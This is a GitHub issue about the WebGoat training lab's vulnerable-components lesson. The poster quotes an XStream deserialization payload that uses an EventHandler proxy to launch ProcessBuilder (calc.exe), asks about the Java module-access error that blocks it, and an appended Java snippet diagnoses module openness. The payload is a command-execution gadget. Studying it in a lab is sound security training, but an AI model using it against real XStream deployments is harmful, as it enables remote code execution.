Vulnerable component lesson - java.desktop does not "opens java.beans" to unnamed module #1193

@shanpig

The command I ran to set up the Docker image is
docker run -p 8080:8080 -p 9090:9090 -p 80:8888 -e TZ=Europe/Amsterdam webgoat/goatandwolf:latest
After that I entered chapter A9, lesson 12.
I searched for solutions and got solutions like the one below:

<contact class='dynamic-proxy'>
  <interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>

I am not a Java developer, so I assume that the XStream unmarshalling process converts the XML into a class that registers an eventHandler. So whenever the Contact calls a method, the eventHandler gets triggered.
I got a lot of blog post results that showed this should work, but the problem is I got an error that I, as a Java noob, have no idea how to solve.
When I use the above XML as input, I get the error:

Unable to make field private java.lang.Object java.beans.EventHandler.target accessible: module java.desktop does not "opens java.beans" to unnamed module @1324409e : 
Unable to make field private java.lang.Object java.beans.EventHandler.target accessible: module java.desktop does not "opens java.beans" to unnamed module @1324409e
---- Debugging information ----
message : Unable to make field private java.lang.Object java.beans.EventHandler.target accessible: module java.desktop does not "opens java.beans" to unnamed module @1324409e
cause-exception : java.lang.reflect.InaccessibleObjectException
cause-message : Unable to make field private java.lang.Object java.beans.EventHandler.target accessible: module java.desktop does not "opens java.beans" to unnamed module @1324409e
class : java.beans.EventHandler
required-type : java.beans.EventHandler
converter-type : com.thoughtworks.xstream.converters.reflection.ReflectionConverter
path : /contact/handler
line number : 1
class[1] : com.thoughtworks.xstream.mapper.DynamicProxyMapper$DynamicProxy
converter-type[1] : com.thoughtworks.xstream.converters.extended.DynamicProxyConverter
version : 1.4.5
-------------------------------

It seems to me that the org.owasp.webgoat.vulnerable_components.Contact might be an 'unnamed module', so that Java doesn't process the XML?
Hope anybody could kindly shed some light for me.
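
The following diagnostic is an added example, not part of the original post and not WebGoat or XStream code. In this JDK error the "unnamed module" is the module of the code that calls `setAccessible` (any code loaded from the classpath), and the check below reports how the running JDK treats that caller for the field named in the error; the class name `ModuleAccessCheck` and its helper methods are assumptions made for the example.

```java
import java.beans.EventHandler;
import java.lang.reflect.Field;
import java.lang.reflect.InaccessibleObjectException;

// Added diagnostic example. Run it from the classpath (for instance
// `java ModuleAccessCheck.java`) so this class sits in the unnamed module,
// the same place a library loaded from the classpath ends up.
public class ModuleAccessCheck {

    // True if the module owning `target` opens its package to `caller`'s module,
    // which is what reflection on private members requires.
    static boolean canDeepReflect(Class<?> target, Class<?> caller) {
        Module owner = target.getModule();
        return owner.isOpen(target.getPackageName(), caller.getModule());
    }

    // Attempts the operation named in the error: making a private field accessible.
    static String tryOpenField(Class<?> target, String fieldName) {
        try {
            Field f = target.getDeclaredField(fieldName);
            f.setAccessible(true); // with default settings, denied on JDK 16 and later
            return "accessible";
        } catch (InaccessibleObjectException e) {
            return "blocked: " + e.getMessage();
        } catch (NoSuchFieldException e) {
            return "no such field: " + fieldName;
        }
    }

    public static void main(String[] args) {
        Class<?> target = EventHandler.class;
        Module owner = target.getModule();
        Module self = ModuleAccessCheck.class.getModule();

        System.out.println("JDK version      : " + Runtime.version());
        System.out.println("target module    : " + owner.getName());
        System.out.println("caller is named  : " + self.isNamed());
        System.out.println("package exported : "
                + owner.isExported(target.getPackageName(), self));
        System.out.println("package opened   : "
                + canDeepReflect(target, ModuleAccessCheck.class));
        System.out.println("setAccessible    : " + tryOpenField(target, "target"));
    }
}
```

A package can be exported (its public API is usable) without being opened (its private fields are reachable by reflection); the error in the post is about the second property.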
